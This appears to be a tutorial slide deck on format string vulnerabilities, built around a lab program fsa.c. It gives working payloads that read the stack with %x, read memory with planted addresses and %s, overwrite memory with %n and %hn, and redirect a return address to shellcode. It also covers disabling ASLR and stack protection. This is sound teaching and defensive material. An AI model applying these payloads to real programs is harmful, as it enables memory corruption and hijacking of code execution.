[MOSUT] Format String Attacks
AJ
2014.1.18
About Me
• Studying at National Chung Cheng University
• A simulator for a 5-axis CNC machine tool
• CUDA programming for real-time collision detection
• 若渴計畫 & MOSUT
Outline
• Illustrating format string vulnerabilities
• A case study
  • fsa.c
  • Compile and set up an insecure environment
  • Viewing the stack
  • Viewing memory at any location
  • Overwriting arbitrary memory
• So, you can…
Format String Vulnerabilities
• The format string comes straight from the attacker: argv[1] is used as the format
• printf(argv[1])
• strcpy(buff, argv[1]) followed by printf(buff): copying the string first does not remove the bug, buff is still the format
• snprintf(buf, sizeof buf, argv[1]);
• …
• EX: compile & execute fsa.c
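The sinks listed above, as an added example that is not fsa.c or any other code from the original deck. The log_line() wrapper is a hypothetical helper of my own: it forwards its arguments to vsnprintf the way many logging helpers do, and because it carries no format attribute, gcc's -Wformat-security check cannot see that vulnerable_sink() hands user data in as the format, exactly as printf(argv[1]) does. fixed_sink() is the one-token fix. audit_format() is a check you can run over an untrusted string that is about to reach such a sink: it counts the conversions that would pull arguments off the stack and flags %n. All inputs in main() are constructed for the demonstration.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical logging helper: forwards to vsnprintf like many real wrappers.
 * Without __attribute__((format(printf, 3, 4))) gcc cannot check its callers. */
static int log_line(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int r = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return r;
}

/* BUG: user data becomes the format string, the same defect as
 * snprintf(buf, sizeof buf, argv[1]) in the deck. */
static int vulnerable_sink(char *out, size_t n, const char *user)
{
    return log_line(out, n, user);
}

/* Fix: user data is only ever an argument and is never interpreted. */
static int fixed_sink(char *out, size_t n, const char *user)
{
    return log_line(out, n, "%s", user);
}

/* What an untrusted string would do if it reached a format function:
 * how many arguments it pulls from the stack and how many %n stores it makes. */
struct fmt_audit {
    int args;    /* conversions (plus '*' widths) that consume an argument */
    int writes;  /* %n conversions, i.e. memory writes */
};

static struct fmt_audit audit_format(const char *s)
{
    struct fmt_audit a = { 0, 0 };
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {          /* "%%" is a literal percent sign */
            p++;
            continue;
        }
        p++;
        /* flags, width, precision, length modifiers; '*' pulls an extra argument */
        while (*p && strchr("-+ #0123456789.*$hlLqjzt", *p)) {
            if (*p == '*')
                a.args++;
            p++;
        }
        if (!*p)                    /* dangling '%' at the end of the string */
            break;
        a.args++;                   /* the conversion itself */
        if (*p == 'n')
            a.writes++;
    }
    return a;
}

int main(void)
{
    /* constructed inputs */
    const char *inputs[] = { "50%% done", "%x.%x.%x.%x.%x", "AAAA.%x.%x.%x.%x.%n" };
    char out[128];
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        struct fmt_audit a = audit_format(inputs[i]);
        printf("%-22s pulls %d args, %d %%n write(s)\n", inputs[i], a.args, a.writes);
        if (a.args == 0) {          /* only then is the vulnerable call well defined */
            vulnerable_sink(out, sizeof out, inputs[i]);
            printf("  vulnerable_sink -> \"%s\"\n", out);
        }
        fixed_sink(out, sizeof out, inputs[i]);
        printf("  fixed_sink      -> \"%s\"\n", out);
    }
    return 0;
}
```

Even the harmless input "50%% done" comes out of vulnerable_sink() as "50% done", showing that the sink interprets rather than copies; with five %x the same call would read five stack slots. Give wrappers like log_line() the format attribute so the compiler reports the vulnerable call, and keep the -Wformat-security warning on rather than silencing it as the deck's compile line does.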
A Case Study: fsa.c
• fsa.c has a local variable x initialised to 97 ('a') and a local char buf[100], and passes the attacker-controlled argv[1] straight to snprintf(buf, sizeof buf, argv[1]) as the format string
A Case Study: Compile and Set Up an Insecure Environment
• Compile
• gcc -g -Wno-format-security -fno-stack-protector fsa.c
• -Wno-format-security silences the "format not a string literal and no format arguments" warning; -fno-stack-protector removes the stack canary. No -O flag is given, so Ubuntu's default _FORTIFY_SOURCE=2 is not in effect; with optimisation on you would also need -U_FORTIFY_SOURCE, because fortified glibc aborts on %n when the format string lives in writable memory
• Disable ASLR (address space layout randomization), otherwise the stack addresses on the following slides change on every run
• sudo sysctl -w kernel.randomize_va_space=0
• x86 (32-bit) machine & Ubuntu 12.04; the 4-byte stack slots and 0xbffffxxx addresses below assume this
Stack Status before Executing snprintf()
(stack diagram; lower addresses at the top, the stack grows downward)
esp ->  ??
        ??
        ??
        x = 97 = 'a'
        buf[100]
Viewing the Stack: "%x.%x.%x.%x.%x"
• Format string = %x.%x.%x.%x.%x (argv[1], which lives on the heap)
• snprintf(buf, sizeof buf, argv[1])
  => snprintf(buf, sizeof buf, "%x.%x.%x.%x.%x")
• Under the C calling convention the arguments are pushed right to left, so at the call the stack looks like this (lower addresses at the top):
  esp ->  buffer pointer        (buf)
          buffer length         (sizeof buf)
          argv[1] pointer       (the format string)
          ??  b7ff3fec          <- 1st %x
          ??  bffff3b4          <- 2nd %x
          ??  0                 <- 3rd %x
          x = 97 = 'a'          <- 4th %x
          buf[100]              <- 5th %x reads buf[0..3]
• snprintf walks the format and, for every conversion, fetches the "next argument" from the slot above the previous one, even though no arguments were passed. The three slots marked ?? hold values the slide does not identify; x and buf are the caller's locals.
• Result: buf = "b7ff3fec.bffff3b4.0.61.66663762"
• The 5th %x reads the first four bytes of buf itself. glibc's snprintf writes its output into buf as it formats (the "copy"), so by the time the 5th argument is "fetched" those bytes already hold "b7ff" (0x62 0x37 0x66 0x66), which read as a little-endian word is 0x66663762. The relative order of copy and fetch is a property of the C library implementation, not of the OS.
• C calling convention: http://descent-incoming.blogspot.tw/2012/11/pascal-call-convention-in-c.html
• Richard Reese, 透視C語言指標 (the Chinese edition of Understanding and Using C Pointers), p.128
Viewing the Stack: "aaaa.%x.%x.%x.%x.%x"
• Format string = aaaa.%x.%x.%x.%x.%x
• 'a' is 0x61 in ASCII
• snprintf(buf, sizeof buf, "aaaa.%x.%x.%x.%x.%x")
• Same stack walk as before (buffer pointer, buffer length, argv[1] pointer, then the slots read by the five %x):
  ??  b7ff3fec      <- 1st %x
  ??  bffff3a4      <- 2nd %x
  ??  0             <- 3rd %x
  x = 97 = 'a'      <- 4th %x
  buf[100]          <- 5th %x
• Result: buf = "aaaa.b7ff3fec.bffff3a4.0.61.61616161"
• The 5th %x now shows 61616161: the literal "aaaa" prefix has already been copied into buf[0..3] when that slot is read back. This confirms that the 5th conversion reads the start of buf, so whatever is placed at the front of the format string is what the 5th conversion will use as its argument, including an address.
Viewing Memory at Any Location
• Format string = $(printf "\xf8\xf2\xff\xbf").%x.%x.%x.%x.%x
• The first four bytes of the format string are the little-endian encoding of 0xbffff2f8, the address of x found from the stack dump. The 5th %x prints those bytes back: buf[0..3] = bffff2f8.
• Format string = $(printf "\xf8\xf2\xff\xbf").%x.%x.%x.%x.%s
• Replacing the 5th %x with %s makes snprintf take the same slot as a char pointer and dereference it, so the output contains whatever is stored at 0xbffff2f8 (here x = 97 = 'a'). Any readable address can be planted this way; an unmapped one crashes the program.
Overwriting of Arbitrary Memory
• %n stores the number of bytes output so far into the int that the next argument points to; that argument is fetched from the stack like all the others, so the planted address becomes the write target
• Format string = $(printf "\xf8\xf2\xff\xbf").%x.%x.%x.%x.%n
• [figure: stack diagram, annotated "26 (??)" and "alignment"]
• Before: %s read the slot buf[0..3] = bffff2f8, and x = 97 = 'a'
• After: %n uses the same slot as an int pointer and stores the byte count. Counting the output: 4 (address bytes) + ".b7ff3fec." (10) + "bffff3b4." (9) + "0." (2) + "61." (3) = 28, so x = 28 = 0x1c
So, You Can…
• With a format string vulnerability:
• View the stack
• Find return addresses
• Overwrite a return address
• Overwrite a return address so that it points to shellcode
• EX (the first four bytes are the address of the saved return address; %n stores the byte count there):
$ ./a.out $(printf "return address").%x.%x.%x.%x.%n
=> return address slot = 28
$ ./a.out $(printf "return address").%x.%x.%x.%4x.%n
=> return address slot = 30
$ ./a.out $(printf "return address").%x.%x.%x.%8x.%n
=> return address slot = 34
$ ./a.out $(printf "return address").%Xx.%Yx.%Zx.%Ax.%n
=> return address slot = shellcode address
• The widths X, Y, Z, A only add padding: they steer the count without changing which slots are read. A single %n cannot realistically reach a full 32-bit address such as 0xbffff2f8 (that would mean producing about 3 GB of output), so real exploits write the value in pieces, two 16-bit writes with %hn or four single-byte writes with %hhn, each with its own planted address (see Scut et al. in the references).
You can overwrite arbitrary memory, if
there are format string vulnerabilities
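The two pieces of arithmetic from the "Overwriting of Arbitrary Memory" and "So, You Can…" slides (what %n stores for the deck's format strings, and how widths steer it), as an added example that is not part of the original deck. Both functions call snprintf with real, matching arguments, so they are well defined and run on any platform; an exploit differs only in that the pointer %n or %hn writes through is not passed as an argument but planted in the format string and picked up from the stack. bytes_before_n() replays the deck's own stack values (0xb7ff3fec, 0xbffff3b4, 0, and 0x61 for x) and returns the count %n records for widths 0, 4 and 8. write_u32_via_hn() goes beyond the slide's single %n: it stores an arbitrary 32-bit value with two %hn writes, the short-write technique from the Scut paper in the references, because one %n would need a byte count as large as the address itself.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Replay the deck's case: "<addr>.%x.%x.%x.%<width>x.%n" over the values the
 * slides found on the stack. Returns what %n stored, i.e. the number of bytes
 * output before it. Width 0 is the plain %x of the slide. */
static int bytes_before_n(int width)
{
    int n = -1;
    char out[64];
    /* \xf8\xf2\xff\xbf is 0xbffff2f8 little-endian, the planted address */
    snprintf(out, sizeof out, "\xf8\xf2\xff\xbf.%x.%x.%x.%*x.%n",
             0xb7ff3fecu, 0xbffff3b4u, 0u, width, 0x61u, &n);
    return n;
}

/* Store 'value' into a 32-bit target with two %hn (16-bit) writes.
 * %hn records (bytes output so far) mod 65536 and the count only grows, so the
 * smaller half is written first and the second field is padded up to the next
 * wrap-around when needed. Total output is at most 131072 bytes. */
static uint32_t write_u32_via_hn(uint32_t value)
{
    union { uint32_t u; short h[2]; } target = { 0 };
    union { uint32_t u; unsigned char c[4]; } probe = { 1 };
    int lo = probe.c[0] ? 0 : 1;                     /* index of the low 16 bits */
    short *half[2] = { &target.h[lo], &target.h[1 - lo] };
    unsigned want[2] = { value & 0xffffu, value >> 16 };

    int first = want[0] <= want[1] ? 0 : 1;
    int second = 1 - first;
    unsigned w1 = want[first] ? want[first] : 65536u; /* %*x prints at least 1 char */
    unsigned w2 = (want[second] - w1) & 0xffffu;
    if (w2 == 0)
        w2 = 65536u;

    size_t cap = (size_t)1 << 18;                    /* room for two 65536-wide fields */
    char *out = malloc(cap);
    if (!out)
        return 0;
    /* An exploit embeds the widths and both pointers in the format string;
     * here they are passed as arguments, so the call is well defined. */
    snprintf(out, cap, "%*x%hn%*x%hn",
             (int)w1, 0u, half[first], (int)w2, 0u, half[second]);
    free(out);
    return target.u;
}

int main(void)
{
    printf("%%n count with %%x: %d, %%4x: %d, %%8x: %d\n",
           bytes_before_n(0), bytes_before_n(4), bytes_before_n(8));
    uint32_t v = write_u32_via_hn(0xbffff2f8u);
    printf("two %%hn writes produced 0x%08x\n", v);
    return 0;
}
```

The width of the last %x before %n is the only knob: 0, 4 and 8 give 28, 30 and 34, as on the slide. For a real address the two-write variant keeps every field below 65536 characters, which is why exploits plant two addresses (target and target+2) and use two %hn instead of one %n.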
Reference
• Tim Newsham, "Format String Attacks"
  http://www.thenewsh.com/~newsham/format-string-attacks.pdf
• stackoverflow, "How can a Format-String vulnerability be exploited?"
  http://stackoverflow.com/questions/7459630/how-can-a-format-string-vulnerability-be-exploited
• Paul Haas, "Advanced Format String Attacks"
  http://www.defcon.org/images/defcon-18/dc-18-presentations/Haas/DEFCON-18-Haas-Adv-Format-String-Attacks.pdf
• David Brumley, course slides
  http://users.ece.cmu.edu/~dbrumley/courses/18739c-s11/slides/0127.pdf
• Scut et al., "Exploiting Format String Vulnerabilities"
  http://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf
